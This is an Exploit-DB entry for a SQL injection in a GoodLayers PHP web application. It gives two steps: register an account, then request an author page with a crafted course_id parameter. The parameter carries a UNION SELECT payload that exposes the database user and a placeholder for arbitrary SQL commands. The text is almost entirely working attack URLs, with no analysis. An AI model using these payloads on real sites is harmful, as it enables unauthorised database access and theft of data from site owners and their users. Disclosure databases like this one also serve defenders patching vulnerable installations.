EDB-ID: 43901 | Author: Esecurity.ir | Published: 2018-01-26 | CVE: N/A | Type: Webapps | Platform: PHP | Vulnerable App: N/A | Injection
# Date: 2018-01-24
# Exploit Author: Esecurity.ir
# Exploit Author Web Site: http://esecurity.ir
# Special Thanks : Meisam Monsef [[email protected]] - Telegram ID :
@meisamrce
# Vendor Homepage: https://goodlayers.com/
# Version: All Version
Exploit :
1 - First enter the link below and create an account
http://target.com/?register=1
2 - the exploit
http://target.com/author/[your-username]/?type=scoring-status-student&course_id=-999999+[SQL+Command]%23
http://target.com/author/[your-username]/?type=scoring-status-student&course_id=-999999+union+select+1,2,3,user()%23
